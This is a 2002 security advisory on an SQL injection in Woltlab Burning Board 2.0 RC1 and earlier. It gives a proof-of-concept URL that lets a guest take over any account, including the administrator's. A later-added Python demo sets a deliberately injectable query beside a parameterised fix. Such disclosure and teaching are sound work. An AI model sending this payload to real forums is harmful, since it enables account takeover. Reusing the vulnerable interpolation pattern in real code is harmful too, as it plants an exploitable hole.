Subject: sql injection vulnerability in WBB 2.0 RC1 and below
Date: Sep 8 2002 1:56PM
Author: Cano2

Hi,

I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1 and below some weeks ago. The latest version (WBB 2.0 RC 2) does not seem to be vulnerable, but there are still sites running vulnerable versions.

[versions tested vulnerable]
WBB 2.0 RC 1
WBB 2.0 beta 5
WBB 2.0 beta 4
WBB 2.0 beta 3

[description]
It allows any user (even guests, depending on configuration) to compromise every other account (the Administrator's too). It is caused by a variable containing unchecked user input in board.php, which can be used for a SQL injection attack. The query looks similar to the following:

UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = '$HTTP_REQUEST_URI', boardid = '$boardid', threadid = 'xx' WHERE hash = '$sid'

Because the content of $boardid is not checked, it is possible to overwrite other fields in the table.

[proof of concept]
board.php?boardid=[boardid]%27,%20userid=%27[victim's userid, 1 is usually an admin]&sid=[attacker's session-id]

The executed query now looks like this:

UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = 'board.php?boardid=[boardid]%27,%20userid=%27[desired userid, 1 is usually admin]&sid=[session-id]', boardid = '[boardid]', userid='[desired userid, 1 is usually admin]', threadid = 'xx' WHERE hash = '$sid'

As you can see, the userid of the attacker's session is overwritten with the victim's.

[solution]
Update to the latest version (WBB 2.0 RC 2) or check every variable that may contain user input, e.g.

$boardid = mysql_escape_string($boardid);

[vendor status]
29.7.02 contacted Woltlab
12.8.02 release of WBB 2.0 RC 2 (seems not vulnerable)
I didn't get an answer from Woltlab until now.
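To show the defect and its fix side by side, here is an added example (not code from the advisory or from Woltlab) that rebuilds the session UPDATE on an in-memory SQLite table: the vulnerable function interpolates boardid the way board.php did, while the hardened one uses a parameterised statement (a stronger fix than the mysql_escape_string call suggested above). The table name bb1_sessions and its columns follow the advisory; the row values and session hashes are constructed, and LOW_PRIORITY is dropped because SQLite has no such clause.

```python
import sqlite3

# Constructed stand-in for the bb1_sessions table named in the advisory.
SCHEMA = """
CREATE TABLE bb1_sessions (
    hash TEXT PRIMARY KEY,
    userid INTEGER,
    lastactivity TEXT,
    request_uri TEXT,
    boardid TEXT,
    threadid TEXT
);
"""


def fresh_db():
    """Return an in-memory DB with one admin and one guest session (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.execute("INSERT INTO bb1_sessions VALUES ('adminhash', 1, '', '', '1', '0')")
    db.execute("INSERT INTO bb1_sessions VALUES ('guesthash', 0, '', '', '1', '0')")
    return db


def update_session_vulnerable(db, sid, boardid, request_uri):
    """Mirror of the advisory's query: $boardid is spliced into the SQL unchecked,
    so a quote inside it terminates the literal and appends further SET clauses."""
    sql = ("UPDATE bb1_sessions SET lastactivity = 'xxx', request_uri = '%s', "
           "boardid = '%s', threadid = 'xx' WHERE hash = '%s'" % (request_uri, boardid, sid))
    db.execute(sql)


def update_session_fixed(db, sid, boardid, request_uri):
    """Hardened form: bound parameters, so boardid is stored verbatim as data."""
    db.execute("UPDATE bb1_sessions SET lastactivity = 'xxx', request_uri = ?, "
               "boardid = ?, threadid = 'xx' WHERE hash = ?", (request_uri, boardid, sid))


def session_row(db, sid):
    """Return (userid, boardid) for a session, for checking what each variant stored."""
    return db.execute("SELECT userid, boardid FROM bb1_sessions WHERE hash = ?",
                      (sid,)).fetchone()
```

Running both variants with the decoded boardid value from the proof of concept shows the guest session's userid flipping to 1 only in the vulnerable path; the fixed path keeps userid 0 and stores the whole string as the boardid.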